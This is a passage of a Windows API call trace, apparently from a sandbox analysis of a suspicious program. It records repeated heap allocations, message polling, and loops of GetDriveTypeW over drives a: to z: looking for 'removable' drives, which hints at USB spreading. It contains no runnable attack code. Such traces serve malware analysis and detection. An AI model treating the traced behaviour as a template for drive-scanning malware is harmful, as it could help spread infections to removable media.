hHeap=0x12c0000) returned 1 [0213.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd358 [0213.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0213.713] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0213.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0213.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0213.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0213.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0213.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0213.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.714] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.714] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.714] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.714] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.714] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.714] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.715] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.715] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.715] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.715] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.715] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.716] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.716] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.716] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.716] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.716] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.717] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.717] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.717] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.717] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.717] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.718] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.718] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.718] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.718] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.719] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.719] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0213.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0213.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0213.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.720] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0213.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0213.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326020 [0213.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326020 | out: hHeap=0x12c0000) returned 1 [0213.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0213.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0213.721] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0213.721] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0213.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0213.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0213.721] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0213.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.721] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0213.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.721] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0213.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.722] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0213.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0213.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0213.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0213.722] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.722] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.723] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.723] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.723] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.723] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.723] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.724] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.724] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.724] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.724] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.724] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.724] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.725] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.725] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.725] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.725] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.725] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.726] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.726] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.726] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.726] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.726] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.727] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.727] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.727] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.727] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.727] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0213.727] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0213.727] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.728] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.728] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.728] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.728] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.728] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.728] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0213.728] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.728] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.728] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.728] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.728] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0213.728] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.728] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0213.728] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0213.728] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.728] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.728] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.728] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0213.728] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.728] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.728] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0213.729] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0213.729] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0213.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.729] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0213.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.729] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0213.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0213.729] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0213.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0213.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0213.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.730] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0213.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0213.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0213.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0213.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0213.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0213.730] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.730] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.730] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.731] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.731] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.731] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.731] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.731] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.732] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.732] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.732] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.732] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.732] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.733] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.733] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.733] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.733] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.734] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.734] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.734] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.734] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.734] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.735] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.735] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.735] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.735] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.735] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.736] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0213.736] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.736] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.736] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.736] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.736] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0213.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0213.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.736] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.736] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0213.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0213.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0213.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0213.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.736] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.736] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0213.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0213.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0213.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.835] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0213.835] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0213.835] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.836] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.836] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.836] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.836] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0213.836] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.836] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0213.836] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0213.836] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0213.837] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.838] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.838] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.838] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.839] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.839] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.839] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.839] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.839] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.839] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.839] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.840] GetDriveTypeW 